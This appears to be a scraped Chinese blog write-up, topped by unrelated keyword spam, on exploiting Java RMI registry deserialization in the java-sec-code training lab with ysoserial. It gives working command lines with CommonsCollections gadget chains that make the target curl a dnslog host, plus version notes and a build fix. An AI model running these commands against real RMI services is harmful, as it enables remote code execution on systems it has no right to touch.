九江网站建设优化公司,二手车网站源码,wordpress网站全过程,虚拟主机空间 配置 网站java-sec-code中rmi 暂时没有搞懂原理#xff0c;这里只说明利用方法 java-sec-code 作者给出的是使用ysoserial进行利用 测试环境搭建 docker环境下#xff0c;1099端口默认不开启#xff0c;这里使用idea运行org.joychou.RMI.Server即可 个人电脑java环境分为1.8.381 1.8.…java-sec-code中rmi 暂时没有搞懂原理这里只说明利用方法 java-sec-code 作者给出的是使用ysoserial进行利用 测试环境搭建 docker环境下1099端口默认不开启这里使用idea运行org.joychou.RMI.Server即可 个人电脑java环境分为1.8.381 1.8.043 1.8.121 测试Java 1.8.121上下版本不同利用方式使用https://dig.pm/作为dnslog平台
java1.8.043环境 poc
java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit target_ip 1099 CommonsCollections1 curl xxxx.ipv6.1433.eu.org/aaadns平台有回显
java1.8.121
利用方式
java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections5 curl d84d55bd53.ipv6.1433.eu.org/rmijava -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit2 192.168.2.3 1099 192.168.2.5 12345当然了这两个命令都运行ysoserial-0.0.6-SNAPSHOT-all.jar是没有问题的区别只在于ysoserial-0.0.6-SNAPSHOT-all.jar是添加了RMIRegistryExploit2重新打包的而ysoserial-all.jar是ysoserial作者提供的原生jar包 java 1.8.381 利用不了 以目前的java版本来说本人并没有找到相应的利用方法可能只是图一乐呵
题外话
https://github.com/JoyChou93/java-sec-code/wiki/Java-RMIhttps://github.com/frohoff/ysoserial编译ysoserial可能会失败建议在vps上面打包使用mvn clean package -DskipTests命令进行打包 打包失败报错如果显示是javax.interceptor-api:3.1失败的话将pom.xml里面的version修改为1.2.2即可
dependencygroupIdjavax.interceptor/groupIdartifactIdjavax.interceptor-api/artifactIdversion1.2.2/version
/dependency
